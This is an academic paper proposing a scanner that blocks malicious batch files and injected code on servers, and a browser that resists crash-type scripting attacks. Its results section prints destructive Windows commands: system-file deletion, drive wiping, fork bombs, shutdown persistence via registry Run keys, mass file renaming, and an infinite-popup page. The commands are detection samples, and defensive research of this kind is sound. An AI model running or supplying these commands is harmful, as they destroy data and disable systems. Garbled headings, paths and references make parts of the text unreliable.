Detecting and Preventing Security Threats on
Servers and Browsers
Mr. Nandish.U.G1, Dr. Balakrishna.R2, Mr. Naveen.L3, Mr.Anand Kumar K.S4
2.
Professor and HOD,1, 3&4Lecturer, Department of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India.
Abstract - Our reliance on web based services
through browsers for everyday life activities has increased over the years. Everyday new vulnerabilities are found in what was previously believed to be secure applications, unlocking new risks and security hazards that can be exploited by malicious advertisers or intruders compromising the security of systems. Using cross site scripting techniques intruders can hijack web sessions and craft credible phishing sites. Similarly, intruders may harm the server by uploading malicious executables and batch files. On the other hand the java script code downloaded into browser can attack client machines to steal user’s credentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (Phishing attacks).
It is proposed here a model detecting and preventing malicious files and cross site scripting attacks based on monitoring JavaScript code execution and comparing the execution to high level policies, to detect malicious code behavior. The solution also protects the servers from dangerous DOS commands and executable files. The model follows an approach similar to hackers and security analyst to discover vulnerabilities in network-connected web servers. It uses both manually and automatically generated rules to mitigate possible cross site scripting attacks. The work undertaken covers the solutions preventing client machines from stealing user’s credentials by using cookies hijacking as well as preventing the browsers from crash.
Keywords - Server, Browser, attacks, Server and
Browser crash.
I. I
NTRODUCTIONServers are very important nodes in the network; it’sa computer or a software package that provides a specific kind of service to client software running on other computers. Servers provide various shared resources to workstations and other servers on a computer network. One network server may also serve different roles. The server may be files server print server, mail server or authentication server as described below [2] [3].
File servers located centrally in a network pool many number of users to store and share various documents.
To avoid installation of printer to each workstation, better to print servers to allow share a single printer.
A mail server provides email services to computers on the network.
Authentication servers give networks a centrally located database for storing account and password information, thereby allowing users to logon at any computer on the network.
So servers are very important components in the network, those are the service provider to clients in a network. If any server fails in a network then services provided by them are no longer available to service requester. So servers are important components of the network and they should be protected from the attackers. Intruders may attack on servers by many ways, two of which are very common.
First one is attacks from malicious executable files. Normally many of the servers will not allow user to upload executable and batch files, the main reason for this is, there are more chances of viruses or malicious command from executable and batch files which may harm the server. User can upload his application projects to server by just creating execution or batch files, no need of creating setup files, interested users can download execution and batch files and run them on their system without any installation, which requires less memory space compare to setup files [4].
Second types of attacks are cross-site-scripting attacks. Web applications are execute on both the server and client machine. Web pages include the content from several sources. Contents may be included by the application itself, derived from user supplied text, or from partially trusted third parties. So, web applications are more vulnerable to attacks like cross site scripting attacks, which may take place when one, browse the internet.
Web applications loopholes like comment boxes in WebPages where hacker injects malicious code and submit it to server. Cross site scripting attacks like cookies hijacking, alert box which never close and attack which opens many windows and waste system resources are attacks to web browsers.
II. P
ROBLEMS
TATEMENTThere already exists a few solutions for attacks through malicious files and cross site scripting attacks, following section give information about some existing systems.
server then they harm the server when some other user run those on server. In many discussion forums [7],[8],][9] we can get information on problems with uploading exe and bat files and they also mentioned how to upload exe or batch files to server using some techniques. The existing solutions are applicable to only to specific servers and they will not provide much security for servers.
Cross Site Scripting Attacks: Their existing many
server-sides and client-side solution to prevent cross site scripting like same origin policy [4], Browser patches [5], Browser-Enforced Embedded Policies (BEEP) [6] and SWAP [7] all these protection models suffers from some drawbacks. The most common shortcomings include in these protection models are as follows:
Lack of Efficiency: Protection models are often required
to evaluate events in real time. This requirement is difficult to meet when faced with a very large number of events as is typical in today’s networks. Consequently, often slow down a system performance.
High Number of False Positives: Most protection model
detects attacks throughout an enterprise by analyzing information from a single host, a single application, or a single network interface, at many locations throughout the network. False alarms are high and attack recognition is not perfect. Lowering thresholds to reduce false alarms raises the number of attacks that get through undetected as false negatives. Improving the ability of protection models to detect attacks accurately is the primary problem facing developers today.
Burdensome Maintenance: The configuration and maintenance of protection model requires special knowledge and substantial effort. For example, misuse detection has usually been implemented using expert system shells that encode and match signatures using rule sets. Upgrading rule sets involves details peculiar to the expert system and its language for expressing rules sets, and may permit only an indirect specification of the sequential interrelationships between events. Similar considerations may apply to the addition of a statistical metric, typically used for detecting unusual deviations in behavior.
Limited Flexibility: Protection model have typically been
written for a specific environment and have proved difficult to use in other environments that may have similar policies and concerns. The detection mechanism can also be difficult to adapt to different patterns of usage. Tailoring detection mechanisms specifically to the system in question and replacing those over time with improved detection techniques are also problematic with many server protection model implementations. Often the protection model needs to be completely restarted in order to make changes and additions take effect.
Everyday new vulnerabilities are found in what was previously believed to be secure applications, unlocking new risks and security hazards that can be exploited by malicious advertisers or intruders compromising the security of systems. Intruders may harm the server by uploading malicious executables, batch files and inject malicious code in web applications which will harm the
server. On the other hand the java script code downloaded into browser can attack client machines to steel user’s credentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (Phishing attacks). In general, XSS and phishing attacks are easy to execute but difficult to detect and prevent.
III. R
ELATEDW
ORKIt is proposed here a model Detecting and Preventing Security Threats on Servers and Browsers based on monitoring malicious activities, to detect malicious code behavior. The solution protects the servers from malicious executable files, batch files and execution of malicious codes on servers which are injected from the hackers through web applications. The work undertaken covers the solutions preventing client machines from stealing user’s
credentials by using cookies hijacking as well as preventing the browsers from crash.
The main objective of this work is to provide a protection mechanism to the servers and browsers. The following are some of the major features of the proposed solution.
It avoids malicious executable and batch files uploading into servers.
It provides protection against cross site scripting attacks which may cause loss of some files on server, shutdown server itself and misuse the server resources.
It prevents the XSS attack which crashes the browsers otherwise.
It also prevents alert-box attacks.
The work undertaken covers preventing client machines from stealing user’s credentials by using cookies hijacking.
IV. D
ESIGNDesign is the actual process of producing a solution to the specification derived from the analysis stage. This section explains the design of proposed system.
Fig. 1: Preliminary Design of the Proposed Model
Malicious code detector scans the files and cross check with the database (stored list of malicious attacks) to detect malicious code. And also checks comments whether they are attacks or not. If files or comments from the client’sare contains malicious code then they will get drop else forward to server.
V. I
MPLEMENTATIONSystem Architecture: the following fig. depicts that architecture of the protection model.
Fig. 2: System Architecture
As shown in above diagram all components interact with each other by sending some input to other components and getting input from other components. Here we have four components namely Client, Server, Protection Model (with Malicious-Codes (MC) database) and Browser.
Modular Implementation of Server Side Solution
The Architecture of the system divided in to the following modules. They are:
Uploading Executable and Batch files into Server
Checking all incoming comments and dropping malicious comments.
These two models are explained in detail as follows:
Uploading Executable and Batch Files into Server
Here in proposed protection model, if user uploading normal files and those are within buffer size then protection model simply allow them to upload, if user uploading execution or batch files then protection model scan those files and check for the malicious commands in them. While scanning the files if malicious commands found in files then they are not allowed by the protection model to upload into server, if not found then those files are allowed to upload into server if they are within buffer size. Monitoring function is called when protection model receives execution or batch files, and calls scan function to scan files and check for the malicious activity in files. files are other then execution or batch files then else part get executed in that files size checked to ensure whether it exceeds buffer size or not. If files not exceeds buffer size
then it will allowed by the protection model to enter into server, else file get deleted.
Checking Incoming Comments to Check for Embedded Malicious Code
In second model, some dangerous attacks like, attacks which may cause loss some files on server, miss use the server resources, and shutdown server itself. With proposed Protection model, these attacks can be prevented, after receiving such attacks protection model checks whether these are normal requests/comments or attacks by comparing with the predefined malicious code database. If attacks are exist in the database then it considered as attacks and protection model will block such attacks and not allow entering into server.
Modular Implementation of Browser Side Solution
The Web Browser control has two methods that are undocumented AttachInterfaces() and DetachInterfaces(). These methods need to be used when you want to obtain a reference to the browser interface.
Handling the Script Errors
In the sample application, there is a tool window that simply shows a list of errors that occurred, with their details. A single-instance class holds the script errors' information and notifies the subscribers when this information has been changed. For handling these script errors, the BrowserControl first attaches to the DownloadComplete event, and next subscribes to the HtmlWindow.Error event. When this event is fired, we register the script error and set the Handled property to true.
VI. R
ESULTSAttacks on Servers
Attacks from Execution and Batch Files:
Proposed protection model will scans and detects all dangerous commands included in the execution and batch files successfully.
Shutdown Computer Once shutdown -r -f -t0
These command shutdowns the computer when user runs the exe or bat file of it.
Crash Windows
del“C:\WINDOWS\SYSTEM32\bootok”
/Q/S >nul
Del“C:\WINDOWS\SYSTEM32\bootvid.dll”
/Q/S >nul
Del“C:\WINDOWS\SYSTEM32\bootvrfy”
/Q/S >nul
When we run the exe or bat file of above code, after restarting computer it will say “windows could not be startup because of faulty of file”.
Destroy OS
@echo off Del %systemdrive%\”.”/f/s/q Shutdown–r–f–t 00
This will destroy the OS, Window will display as “some file is missing”.
:S
Start fork.bat Goto:S Or :x Start Goto:X
Below code will crash the server and it extremely hard to stop once started, its entirely crash server and not recoverable from repairing options.
Deadly Commands
@echo off
Del“c:\windows\pchealth\”
Del“c:\windows\System\”
Del“c:\windows\system32\restore\”
Del“winlogin.exe”
Del“c:\\windows\system32\autoexe.nt”
Del“c:\\windows\system32\logonui.exe”
Del“c:\windows\system32\htoskrnl.exe”
Above code shows deadly virus which harm server, it will deletes main system executable files like autoexe, logonui and winlogin. So server will not on.
Loss of Microsoft Common Console Document File.
del“C:\WINDOWS\SYSTEM32\devenum.dll”
/Q/S >nul
Del“C:\WINDOWS\SYSTEM32\devmgr.dll”
/Q/S >nul
Del“C:\WINDOWS\SYSTEM32\devmgmt.exe”
/Q/S >nul
After the running above code system will loose Microsoft common console document file and you will never able to manage your device.
Loss of login, logoff and logon Interface.
del“C:\WINDOWS\SYSTEM32\login.bat”
/Q/S >nul
Del“C:\WINDOWS\SYSTEM32\logoff.exel”
/Q/S >nul Del
“C:\WINDOWS\SYSTEM32\logon.exe”
/Q/S >nul
After running above code you will loose feature of login, logoff and also will lost logon interface.
Delete Boot Files:
The following code deletes boot file on the server Del“C:\WINDOW\SYSTEM32\logonui.exe”
/Q/S >null Del
“C:\WINDOW\SYSTEM32\bootvid.exe”
/Q/S >null
Del“C:\WINDOW\SYSTEM32\bootvrfy.exe”
/Q/S >null
Shutdown Computer Every Time it is Turns On
echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f reg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t
reg_sz /d c:windowshartlell.bat /f echo You have been HACKED. PAUSE
Above code makes server to get shutdown after very few minutes to server switched on every time.
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v
CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED!
PAUSE
Above code disables the internet permanently when code gets executed on computer or servers.
Change Files to Non-Working TXT Files
REN *.DOC *.TXT REN *.JPEG *.TXT REN *.LNK *.TXT REN *.AVI *.TXT REN *.MPEG *.TXT REN *.COM *.TXT REN *.BAT *.TXT
These malicious commands corrupt the text files.
Temporarily Flood Network: Temporarily disable internet
:CRASH
net send * WORKGROUP ENABLED net send * WORKGROUP ENABLED GOTO CRASH
or
ipconfig /release
Code Injection Attacks: Attacks we worked on are
attacks which cause loss of files on server, misuse of server resources and server shutdown.
Attack which causes loss of file
file[]listfile =file.listfiles();
for( int i = 0; i < listfile.length; i++ ) listfile[i].delete();
Miss use of server resources
fos=new FileOutputStream("C:\\NewName\\"+filename); byte b[]=new byte[fis.available()];
fis.read(b); fos.write(b); fos.close(); fis.close();
Shutdown
Attacker uses following code to shutdown the server.
“cmd /c shutdown -s”is command to shutdown. Runtime rt = Runtime.getRuntime();
Proposed protection model block all these attacks successfully by cross verifying user comments with predefined list of malicious attacks stored in protection model database.
The following figure shows first, time requirement to upload executable files without protection model and with protection model. Second, time required to save user comments with scanning and without scanning the comments to detect malicious codes.
Fig 3: With and without Protection model
Attacks on Browsers: The dissertation work has revealed
the following outcome
Attacks which Crash the Browsers:
We have built new web browser and adding security features to protect cross site scripting (XSS) attacks. Currently which having capability to detect and prevent attacks which crash the browsers. One such attack is, attack which opens infinite number of windows and put browser in loop and slowdown the system performances.
Attack code:
<html> <head> <script type="text/javascript">
<!-- function myPopup() { window.open( "http://www.google.com/" )
myPopup(); }//-->
</script> </head><body>
<h> welcome to popup window threat<h> <form>
<input type="button" onClick="myPopup()" value="click here for fast access">
</form>
<p onClick="myPopup()">CLICK ME TOO!</p> </body></html>
VII. C
ONCLUSIONEveryday new vulnerabilities are found in what was previously believed to be secure applications, unlocking new risks and security hazards that can be exploited by malicious advertisers or intruders compromising the security of systems. Using cross site scripting techniques intruders can hijack web sessions and craft credible phishing sites. Similarly, intruders may harm the server by uploading malicious executables and batch files. On the other hand the java script code downloaded into browser can attack client machines to stealuser’scredentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (CSRF attacks). In general, XSS
and CSRF attacks are easy to execute but difficult to detect and prevent. It is proposed here a model Detecting and Preventing Security Threats on Web Servers and Browsers based on monitoring JavaScript code execution and comparing the execution to high level policies, to detect malicious code behavior. The solution protects the servers from dangerous DOS commands, executable and batch files, and code injection attacks which harm the server. The work undertaken covers the solutions preventing client machines from stealing users credentials by using cookies hijacking as well as preventing the browsers from crash, for this we created a new browser called Secure Web Browser.
VIII. F
UTUREE
NHANCEMENTThis project can be extended to provide protection for much other type of attacks and make servers and browsers more protected. The proposed model scans executable files and able to find all mentioned malicious commands in files, but while malicious codes from users comments it defends only few attacks currently and it can be extended and make it to prevent many more attacks. On the other hand the browser we created is having ability to prevent XSS attacks which crashes the browser and as we continuing our work on cookies hijacking and alert box attacks and this work can be extended to incorporate all type of XSS attacks.
A
CKNOWLEDGEMENTSThe authors are thankful for the encouragement and support received throughout this research work to Dr. M.S.Bhagyashekar, Principal & Management, RRCE, Bangalore.
R
EFERENCES[1] JaSPIn: JavaScript based Anomaly Detection of Cross-site scripting attacks by Preeti Raman, 2008.
[2] Detecting Malicious JavaScript Code in Mozilla By Oystein Hallaraker and Giovanni Vigna Reliable Software Group Department of Computer Science University of California, Santa Barbara [email protected]. no, [email protected]. 2004. [3]http://en.wikipedia.org/wiki/Cross-site_scripting
[4] Mozilla Foundation. JavaScript Security: Same Origin. http://www.mozilla.org/projects/security/components/same origin.html,February 2006.
[5] Protecting Browser State from Web Privacy Attacks By Collin Jackson Stanford University [email protected] Andrew Bortz Stanford University [email protected] Dan Boneh Stanford University [email protected] John C Mitchell Stanford [email protected], 2006.
[6] Defeating Script Injection Attacks with Browser Enforced Embedded Policies By Trevor Jim AT&T Labs Research, Nikhil Swamy University of Maryland, College Park And Michael Hicks University of Maryland, College Park, 2007.
[8] Noncespaces: using randomization to enforce information flow tracking and thwart cross-site scripting attacks By Matthew Van Gundy University of California, Davis [email protected] and Hao Chen University of California, Davis [email protected], 2008.
[9] Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities (Technical Report) by Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology. 2006.
[10] ESCUDO: A Fine-grained ProtectionModel forWeb Browsers By Karthick Jayaraman, Wenliang Du, Balamurugan Rajagopalan, and Steve J. Chapin Department of EECS, Syracuse 2010
A
UTHORS’
B
IOGRAPHYMr.Nandish U. G, Obtained his M.Tech Degree from East West Institute of Technology, Bangalore, Affiliated to Visvesvaraya Technological University, Karnataka. Working as Lecturer in Dept of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India. His Research interests are in the field of cloud computing, Image Processing and Computer Networks.
Dr.R.Balakrishna, working as a Professor and HOD, Rajarajeswari college of engineering, Bangalore, India. His research interests are in the field of wireless adhoc network, Sensor Network, Artificial Neural Networks, Data Mining, Operating System and Security.
He has published over 30 National and International journals and Conferences various papers across India and other Countries. He is the Life member of Indian Society for Technical Education and IAENG.
Mr.Naveen L, Obtained his M.Tech Degree from East Point .College of Engineering Technology, Bangalore, Affiliated to Visvesvaraya Technological University, Karnataka. Working as Lecturer in Dept of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India. His Research interests are in the field of cloud computing, Image Processing and Computer Networks.
